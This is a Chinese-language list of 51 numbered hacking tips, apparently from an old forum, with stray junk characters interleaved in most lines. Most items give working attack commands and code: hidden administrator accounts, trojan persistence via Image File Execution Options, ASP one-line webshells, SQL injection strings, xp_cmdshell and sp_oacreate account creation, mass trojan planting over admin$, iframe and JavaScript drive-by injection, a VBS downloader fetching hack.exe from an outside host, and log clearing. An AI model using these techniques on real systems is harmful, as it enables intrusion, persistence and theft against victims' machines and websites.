Xp系统修改权限防止病毒或木马等破坏系统,cmd下,4 r1 J# c; r; A" F
cacls C:\windows\system32 /G hqw20:R$ U# h) i* h _$ Q1 `( I8 q
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
1 H" g. C5 D# K- r恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F8 r3 R& g" o1 s% ~$ K9 c9 H
. u; C# V+ s# f2 B+ g% P2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。. O5 G8 W, L2 _+ ^
9 I; c; [0 |4 W' x0 H) c
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。& _7 v5 s9 @* ^
% G! O- g/ `& X9 R. l& Y" P2 B
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号1 R+ P6 R$ ^4 ~( |! ~6 j( f! x# P$ Z
3 [8 Z9 E* F2 E+ {, x) N4 `5、利用INF文件来修改注册表5 l7 n0 e$ M* o F% w7 S" K
[Version]
: C: d, q2 C4 x+ @Signature="$CHICAGO$"
. j5 L: e8 S4 i- P[Defaultinstall]& _; n0 V. X' e% I
addREG=Ating
+ L# B e& B0 c[Ating]4 a" ^& @1 w/ I7 z
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
! ?( e0 n. x, ~8 Y) |8 b$ T6 p- v3 P以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:9 n2 l4 V9 i$ T8 T8 `
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径: u$ @6 v& ?2 J$ x" N& z; v3 o
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU, L' N* J$ m. N9 K3 ~4 C
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
, m6 W6 l" g; N" \HKEY_CURRENT_CONFIG 简写为 HKCC
" [5 r2 C" P# n% ]8 v, r9 m+ T. K0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值" a) O! \- m) Q& o/ `
"1"这里代表是写入或删除注册表键值中的具体数据
6 a+ o9 b f3 _) v4 p. Q" e6 H$ L; @, I9 ?- K: e! }, t
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,' k: f9 t- \6 ]+ g$ r$ ~: v4 @
多了一步就是在防火墙里添加个端口,然后导出其键值
+ H/ l+ z+ I( y, a6 i[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]( u: A0 `# e% i7 v& t
& u" k2 H; Q, x* t7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
* G4 Y9 n7 B5 { }# L& }* @在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
5 ]; k# I! X3 d8 N7 R+ D; I( }- B( b1 A
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
& C; b5 y: U5 q; z% s- Y n) Q2 Y; W- `4 I. S
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
/ p8 ~, r4 k5 Q/ {5 S可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
0 m- Q2 ~ J8 ^! B: }1 ~6 \
/ k) o4 m/ A3 H# P8 [& S' F10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
d: y6 B# [8 |2 ?5 [, V( R0 J3 B; Y! ^3 t! Q4 s
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
0 \3 O) b0 V8 Q! V/ s9 n0 K用法:xsniff –pass –hide –log pass.txt. N8 ^( k+ w$ _' F
/ u7 r: j( [1 z
12、google搜索的艺术
# N, v- G( V5 l7 _- F% e% Y; I) N搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
/ C3 i2 V/ r S2 u1 y或“字符串的语法错误”可以找到很多sql注入漏洞。5 v8 f- X9 R7 J
% x8 m) g. ^; a$ z6 x' r: A- Z
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。 H( ]' r4 j+ I" Y
1 P/ p& u! T6 \( g- ]' K14、cmd中输入 nc –vv –l –p 1987" y, r# D0 O$ Q3 M, t2 p2 E
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
% {& j- x; T' K+ d! S \( O
/ O, A, V8 f* I0 O4 ?15、制作T++木马,先写个ating.hta文件,内容为5 `& e8 r% @/ K
<script language="VBScript"># s' ~% L6 {5 d$ @ f4 b/ |, R
set wshshell=createobject ("wscript.shell" )
: t/ u2 O7 \ B. g3 ta=wshshell.run("你马的名称",1)
8 C6 E7 z5 x# O' e$ x9 I2 _8 ~, Qwindow.close) d& g: m$ U) L; ^
</script>
5 S$ H. }, {! Y; T& r再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。; z% h/ C- c, U
7 f! h0 Q" H. f$ S7 b16、搜索栏里输入" d1 m; }* q6 M) X9 E( f
关键字%'and 1=1 and '%'='9 q' S" b3 H- o! T+ x6 S/ K$ ^
关键字%'and 1=2 and '%'='
, d0 X! ?, F g( ?, r比较不同处 可以作为注入的特征字符
/ ^! x' m. _ ?& h* Z
; \/ X, H% ^3 s) i+ z1 u5 _17、挂马代码<html>% z e4 a$ m& H2 ~, F0 Y
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
3 O1 m. s' F8 k; A+ r Y</html>
7 R- t- r4 q! o" J5 @5 Y0 U; k3 G- `; Q# g) O2 z+ i
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
- `+ F% m/ X& _# _+ Anet localgroup administrators还是可以看出Guest是管理员来。5 r7 L. l2 P& ~2 V9 v
, J/ f1 r. {% \+ }% L9 B, e. ^19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等9 V# E! g i$ j" i' I4 L
用法: 安装: instsrv.exe 服务名称 路径
" h* Q$ ?( E& N6 A4 e) u卸载: instsrv.exe 服务名称 REMOVE
2 x$ W% U2 _, O) K3 {8 `; s1 s& F* [4 k* j# e( K. G) W H- Z
. ?) m& w. C1 ` ?21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
$ u1 T5 N7 o/ c8 ]不能注入时要第一时间想到%5c暴库。
/ X" S1 ?( w/ Y& E: k6 k
) a( v3 o7 C0 K/ F' y( A22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~; ^/ z* q5 s4 R1 n# ~9 G2 F
/ }4 B, |# l% U& o. q% E23、缺少xp_cmdshell时; T6 D+ P e6 @9 W
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
$ _! G- o# v# r! D* f假如恢复不成功,可以尝试直接加用户(针对开3389的)
# ]# d9 _8 k& s& Z8 ]# W6 kdeclare @o int- B# K0 s- \% U) v
exec sp_oacreate 'wscript.shell',@o out t- a- q# {; C# A; j5 |
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
9 D& z& B* |2 w3 W9 i! ~/ O9 }5 M) A) @6 x- i
24.批量种植木马.bat
7 ]: D+ [9 p& X0 ~" ^" b5 a0 T! lfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
( C. {, n% k+ X) o4 kfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间' J, C, f# Q5 r8 e+ e4 ]" w
扫描地址.txt里每个主机名一行 用\\开头8 h. U6 E6 J, |
/ y# Q, m' `7 a( g. o
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。8 y; B6 ~8 Y: ]- z% B$ F
( A J+ |$ N3 W! z) h! o
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.! R2 q' \) @% r, ?
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
% F+ \$ _7 X. t1 l. b.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
" e A" ?, ~8 v1 ~" o! c( o1 s5 L3 P$ y0 Q3 r9 Q, E1 S% i
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
& y/ B. ]: @0 Y2 V1 U6 P然后用#clear logg和#clear line vty *删除日志6 I+ S0 v$ Y1 w. E w) y. N
3 n6 K! k2 J; d; b
28、电脑坏了省去重新安装系统的方法
7 Q7 [/ O# Q* T! z. \纯dos下执行,& _/ `0 i+ b8 T
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config9 a E1 r' C, ?. [
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
8 k0 n( Z1 W# y7 Z% `
: C( M# C' ~/ C29、解决TCP/IP筛选 在注册表里有三处,分别是:3 c7 c, t% k6 u, ?, w/ H' o
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip' Q2 b- u! b# D& x- U
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip7 T* @# }( ?$ t( r) c k
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip2 e X3 X3 T3 R# \
分别用+ s3 r! s4 P8 |+ {+ Q
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
; k: E: a. n2 E3 a B! ~$ Rregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
+ X" _0 B( S( Bregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip" n% s: X/ R+ c6 I
命令来导出注册表项& A- G \, g( i& R1 l
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
% k) [6 j; ~- |* `改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
" Q. H2 D' W3 c3 a" O' Yregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。, X7 K* `1 _: w S) |7 d8 [
% @8 e K( K7 ?: W* f3 z- x30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U) g. e. {7 B; g! H. c
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
6 r. s- t7 r" r( u1 J: U$ U3 q! R
k4 O7 W( ~# n7 ]31、全手工打造开3389工具2 ]3 b5 F8 H: D8 }' x
打开记事本,编辑内容如下:
, j9 t& k5 u7 H% |5 a) D }1 F. Iecho [Components] > c:\sql- k% x Z/ e+ A7 @8 S8 e
echo TSEnable = on >> c:\sql3 Y! M. q3 P1 W: @0 G
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
- t3 B/ ^7 Z& K+ A编辑好后存为BAT文件,上传至肉鸡,执行
+ q. C# Z3 l) }* t! w
2 B6 _( x8 Z( p1 c) B3 g32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马( Y* S- P% x2 E ?# g) S! d
- {6 U3 u [6 i+ J/ s: m" u1 i33、让服务器重启- ?& G" t) h2 @- D9 F; m: \! p: V
写个bat死循环:
3 @8 c3 |; g1 O@echo off; L' b' Z [- v% d1 T& R8 ?
:loop1; ]7 G: N' t" V& }1 G' i- ?* U# V0 B
cls
$ _: `+ _8 @5 D0 |0 x2 `( ?- F3 vstart cmd.exe
9 J+ ~4 j) O' g ?goto loop1- `0 J2 x8 o+ J6 p* h4 F# l
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
" g) i. M; {- i) S$ p( ]
: n# x" r6 i- [4 {7 ~( K) C& W34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,' `1 R, h! x2 T! B) u7 f5 j
@echo off. L: w# x/ ~4 D' ^: P7 d
date /t >c:/3389.txt+ P) L8 y2 d/ F4 l3 m
time /t >>c:/3389.txt
2 O: p$ e4 v& G+ y6 U" ~; }( x; aattrib +s +h c:/3389.bat
9 G- q c" T, {2 S! E6 hattrib +s +h c:/3389.txt
. v5 }* I3 O; W5 Unetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
. P1 t, g1 ]# n' r/ z% H- A" y& `并保存为3389.bat# L+ L7 {- A& E$ H7 b, k9 Y
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
5 `; _" e& \) C: d5 Q* e8 e3 `& M q3 m: n
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
* o7 e2 A, l! ^8 _- l, ^start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)! T ?: N8 ^ Q S
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
) _% { q; B8 G# y* t' b# C4 y+ y; w, ]+ q% |
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件( I/ V$ |1 Z$ V6 s, D
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址/ H4 U( E2 h5 H! C& ~* I- x4 l
echo 你的FTP账号 >>c:\1.bat //输入账号
C& H% v+ Z( r5 ]4 |4 \" Y( I( F( Pecho 你的FTP密码 >>c:\1.bat //输入密码
3 V F- s" P4 lecho bin >>c:\1.bat //登入
6 Y0 z; c$ }- g& K3 D" {echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
+ s9 ?6 A2 q2 wecho bye >>c:\1.bat //退出$ ? g6 v% p# r) H! |- O
然后执行ftp -s:c:\1.bat即可
1 L5 c L+ W( P; R* p) d, n- U4 q. h2 d. _5 i9 I! x2 U
37、修改注册表开3389两法
( ~8 B( {' s" e. C* U D(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
& i {8 W6 C9 |2 Wecho Windows Registry Editor Version 5.00 >>3389.reg4 M1 _7 _1 C% ~7 i
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg6 `+ j) O. E5 w& N
echo "Enabled"="0" >>3389.reg+ c2 X4 d. H! e' `
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
& H2 o2 C. A3 d9 vNT\CurrentVersion\Winlogon] >>3389.reg
( H4 s; y. P+ W2 e# Secho "ShutdownWithoutLogon"="0" >>3389.reg
- w7 w8 Q/ t- C1 Aecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]' t* X8 v( h1 J) V6 J- |6 S
>>3389.reg I$ V5 K: {2 t5 S
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg' \8 M! A9 f# q) K: @# `" T9 i
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
# \8 P. B- i6 v/ N' p, F7 P( o8 h>>3389.reg/ @9 |( U2 T( w) S. H
echo "TSEnabled"=dword:00000001 >>3389.reg
6 M) o/ b/ C/ `6 H$ Zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
+ w9 z/ r: _ q, Q% @echo "Start"=dword:00000002 >>3389.reg
/ |7 Q$ }" d& W2 C8 Secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
0 g* J9 d( Q% S/ i5 |; Q>>3389.reg
1 U* S; F, r/ s! T& V2 _# {echo "Start"=dword:00000002 >>3389.reg" ` A% G6 d b) o
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg ^7 J6 P3 d, l1 v2 Y) _
echo "Hotkey"="1" >>3389.reg
0 \" A k. d9 K' K4 Techo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
! E4 X {+ t1 @, T* vServer\Wds\rdpwd\Tds\tcp] >>3389.reg
) r9 a8 d5 Q9 L Pecho "PortNumber"=dword:00000D3D >>3389.reg
) z) R6 C1 X5 P- a+ M1 y- r- l" z+ ~echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
* B! x) c0 L( y) n7 S, a7 G, q. c4 uServer\WinStations\RDP-Tcp] >>3389.reg
1 |- \4 e4 s8 m+ M: J+ W/ p" Lecho "PortNumber"=dword:00000D3D >>3389.reg1 @/ e; k% N& i- g
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。8 ~ ?5 ~, ~! i" Q) }! [9 r
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)* Q# ^ r0 Z( z. v
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效; b! e* ^! q3 |7 I& f' j* v# h6 T
(2)winxp和win2003终端开启
& G- [% ~0 p0 }用以下ECHO代码写一个REG文件:7 M, `7 {# F! @5 U
echo Windows Registry Editor Version 5.00>>3389.reg5 i; U' g. Z1 E' Y/ s) V
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal* r" l, D5 U. O% L
Server]>>3389.reg
' p% v# x- l! O% ?3 v5 C0 Oecho "fDenyTSConnections"=dword:00000000>>3389.reg
0 \ \7 \- c% ~8 V2 E: becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal( ~8 B1 y% {8 e$ W1 O- {# H0 }
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
0 x+ N. i8 W3 ~( C9 [# Lecho "PortNumber"=dword:00000d3d>>3389.reg
3 z, R& F$ o8 a3 Qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
# h6 V- z" `5 `, A4 n6 H4 T, qServer\WinStations\RDP-Tcp]>>3389.reg4 D. s9 L2 ?4 @
echo "PortNumber"=dword:00000d3d>>3389.reg
$ ?9 |) o4 l# N# r: `, A然后regedit /s 3389.reg del 3389.reg
" U/ s8 }: c& t# ?. C" P4 OXP下不论开终端还是改终端端口都不需重启" r+ _- E0 W7 o, j- z0 p/ @
0 P/ r* B2 E4 b- I9 S38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
8 z7 C; E3 u+ V3 T' X用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
' n y# \( ]- Q2 w1 K1 s$ }
. X, h% _+ c9 P5 h4 H0 w4 X& i39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
; v( T- l/ _, s- P$ k: u(1)数据库文件名应复杂并要有特殊字符
- ]! R5 J1 Q+ q& k0 w(2)不要把数据库名称写在conn.asp里,要用ODBC数据源! g% a9 L8 H' m5 ~& B
将conn.asp文档中的
1 z9 u4 z! v7 v$ g x( _DBPath = Server.MapPath("数据库.mdb"); t( [) k& p% l3 s5 X/ e
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath/ }: c$ \6 k$ C" G4 L; M3 i
, _0 {1 c: O/ A3 c* \4 w- } l: a# E
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置. ]4 X$ A/ u/ V8 [6 ^6 ]. G1 `
(3)不放在WEB目录里' ~) H' }# k( ~( `4 b0 J
: K* \" Z/ D! P, y. U, n( ^40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉7 V% v+ I9 J9 x9 g
可以写两个bat文件# p' T6 r0 `; v- T
@echo off
9 p& s/ M' Q8 W4 i@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe+ E! P0 \; x" |' c' K/ |8 g( K
@del c:\winnt\system32\query.exe
- j' J7 ~ Q9 a6 O@del %SYSTEMROOT%\system32\dllcache\query.exe9 f; M# L% m8 H2 [& t2 {2 ?
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的 S. D0 V# d) u9 E* M
" ]8 R9 c% E. k* H1 |# o, |@echo off4 b9 L( X7 c. v5 p }
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
8 k @ h5 T) y@del c:\winnt\system32\tsadmin.exe! u+ A# J/ A0 D2 P
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
* F$ O! I6 G1 [
: x, {- \9 m( L2 D, ^41、映射对方盘符
1 q; L. c, L* B1 C# ctelnet到他的机器上,
: j$ Y7 R* q$ F$ W% Inet share 查看有没有默认共享 如果没有,那么就接着运行1 D5 B+ J( `2 V: s9 h
net share c$=c:
0 a- X- U, | m# Q' Jnet share现在有c$
& R+ F# F) \% a4 O' }在自己的机器上运行4 m4 W( v( |3 P
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
+ R) D% R" s9 Q( |
# c6 W% k* E- F% Z" n* L42、一些很有用的老知识
" ~6 Z7 o t5 [0 v$ ctype c:\boot.ini ( 查看系统版本 )
# w7 o- Z/ i2 w# Rnet start (查看已经启动的服务)
) o1 l. n( g b- `' K i$ pquery user ( 查看当前终端连接 )6 R2 l+ Y3 u4 H( ~! Z7 ?
net user ( 查看当前用户 ): }* @! H7 K9 u" @9 G' G
net user 用户 密码/add ( 建立账号 )
5 L: `7 y4 V6 ?3 Q8 J: w( \" Unet localgroup administrators 用户 /add (提升某用户为管理员)
! w7 c2 s9 g7 k: c7 a u; Vipconfig -all ( 查看IP什么的 )
b5 V( T$ y; G+ D+ bnetstat -an ( 查看当前网络状态 ). N: w8 B+ z$ a& ?$ z
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
) ?$ M0 `- h! v$ I克隆时Administrator对应1F4. A# P6 m* Q3 K' V/ L
guest对应1F5
2 ^- u( ~+ B) k+ c1 w9 jtsinternetuser对应3E8' _ e" r& l5 Q# d' B
; t# u8 m! v5 R2 s
43、如果对方没开3389,但是装了Remote Administrator Service
) n+ ~5 r) p' Z用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
/ x$ u( Q6 n: x- o% y. T解释:用serv-u漏洞导入自己配制好的radmin的注册表信息$ Z/ r5 [6 k" X( O
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
1 i5 Q: E) L4 y9 k( @9 Q/ _6 O9 z
! e7 ?* u/ F/ T6 R }44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
; Q6 B% W1 f, P+ X本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
. D0 b, X3 D$ {6 s; K; I5 B
: i8 }7 c; a n/ `: c; t/ Q; B45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
* r7 z9 _, z$ b( @( eecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open/ ]4 O7 T6 S3 I- U4 D2 l
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =7 ~2 F. G0 i) ^# Z7 F* a& B* }
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =8 @, [' e3 B3 L. o% V1 N, [
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
+ B9 ?! |2 j' i$ D& T(这是完整的一句话,其中没有换行符)
! T0 G- w8 K9 r! p) W+ y然后下载:; N/ X3 e+ m0 f
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
! B; X" c) t$ _% @7 c0 Y; U$ z( }! B8 k3 j* t
46、一句话木马成功依赖于两个条件:2 U0 b4 s% d' |) a
1、服务端没有禁止adodb.Stream或FSO组件
+ Q2 q6 w4 x; A7 P2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。$ z4 \) E3 G/ |4 T9 `$ Q
1 J8 W1 Q4 t% c( l
47、利用DB_OWNER权限进行手工备份一句话木马的代码:- F, j; p6 |4 v5 n- s$ g7 W4 h/ x+ {
;alter database utsz set RECOVERY FULL--
$ _/ i& q' j* I( x: w0 e8 a;create table cmd (a image)--
9 {; G2 B2 Y2 z4 O& `0 j;backup log utsz to disk = 'D:\cmd' with init--
3 z, O% N1 r1 N/ H;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--8 U- p- H( C; @" k7 d( t& z( K8 _
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--5 @$ c6 o, d9 Z f- v }6 s1 w
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。 N/ @7 f; k; j( q( U# o2 b% o
0 U2 q5 l$ h( v- P4 T7 w4 ^* ?! I" b48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
7 z3 p, w) O) w \; ^9 G( `: E2 s
3 v0 ?# u9 i1 k$ `- \用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
8 s; x: b/ j O6 v+ O所有会话用 'all'。
8 C: J4 N1 s4 C2 p$ Y# z-s sessionid 列出会话的信息。
6 p( T/ q6 U2 O" @$ A-k sessionid 终止会话。 [, Y% \( p' ~% ?; e
-m sessionid 发送消息到会话。
8 v$ [( T7 O+ _$ X% r V& A2 y- b& s7 H1 x6 Y! Q l- R
config 配置 telnet 服务器参数。
2 R) u; H6 O' K2 M7 C) }, M5 F; o& H" C! Q) U5 L& m) m
common_options 为:
( a G, W7 N; Z3 n9 N+ H5 P-u user 指定要使用其凭据的用户
% a- v3 b6 w; E& W: `: Y1 C1 P# T-p password 用户密码
8 n" S8 s5 i: ]5 W9 z8 j- P7 u% `7 V6 Y. o, P h. p% u
config_options 为:4 t! ]2 v! J) r6 U4 N$ |1 m6 A
dom = domain 设定用户的默认域
+ h% D, u! \2 k( _# b ~" }# Tctrlakeymap = yes|no 设定 ALT 键的映射$ D+ T: X* e* U3 @4 W% N- O% ?
timeout = hh:mm:ss 设定空闲会话超时值
' a% F% X1 R! l% Z. |# x# Utimeoutactive = yes|no 启用空闲会话。
5 K9 ~+ M5 e8 h6 c4 [. Y) M2 f" \maxfail = attempts 设定断开前失败的登录企图数。
0 H2 o) Q* g% | k, Dmaxconn = connections 设定最大连接数。/ k7 q1 t: D, L/ x5 Z4 {
port = number 设定 telnet 端口。
+ l; _3 H# l5 \+ z# K( Esec = [+/-]NTLM [+/-]passwd3 q9 L5 X; d6 x+ i
设定身份验证机构, I& p: W9 \1 S& Z) V$ N& S' j) a# u
fname = file 指定审计文件名。9 Y4 z9 j1 E- ]7 \$ ?. e- `
fsize = size 指定审计文件的最大尺寸(MB)。
4 O; e/ _) j- N' M1 Omode = console|stream 指定操作模式。
9 P. S$ t4 H; ~, h, \' e# Jauditlocation = eventlog|file|both
0 e1 O/ H$ b* S8 S指定记录地点4 M; r( ], |$ d
audit = [+/-]user [+/-]fail [+/-]admin( H. Y. }$ p6 \, R; q# e% j8 ~
' S7 |) P/ @- P( a
49、例如:在IE上访问:
8 _) k6 R) l3 z3 P" C H hwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/: Y1 v1 E6 s" |" m3 b& P: B/ N
hack.txt里面的代码是:
6 F% o% i5 v: [$ y9 K2 K. j7 m<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">0 y3 ~) C8 v6 h# a4 F5 {6 a
把这个hack.txt发到你空间就可以了!# `) a f" {" {9 K' e
这个可以利用来做网马哦!
0 ?. n9 f y" h" g( L/ u0 ~& a+ O6 J4 I5 n. `
50、autorun的病毒可以通过手动限制!# Q* }% i: U2 J& O" u1 u
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
5 v- d- P' p' M* N5 A2,打开盘符用右键打开!切忌双击盘符~
; C' h' A% u8 p3 M- y2 w3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
v: E6 `( ]/ e4 n3 h6 ~ d! Y* D" B4 n! N* i- `0 v0 N# Y# ]/ K
51、log备份时的一句话木马:2 f0 _& \- d6 j. K: K( s
a).<%%25Execute(request("go"))%%25># J) `) M! G( o/ t v
b).<%Execute(request("go"))%>& G N+ }8 T& L- e4 B y# j! A
c).%><%execute request("go")%><%- V6 C6 D; ~0 N
d).<script language=VBScript runat=server>execute request("sb")</Script>3 `( F1 f3 I$ T5 Z) x
e).<%25Execute(request("l"))%25>& v l7 ?: y0 w& M8 U$ i- f2 S" g
f).<%if request("cmd")<>"" then execute request("pass")%>8 x, Y. j. _% R8 g) q5 r+ @
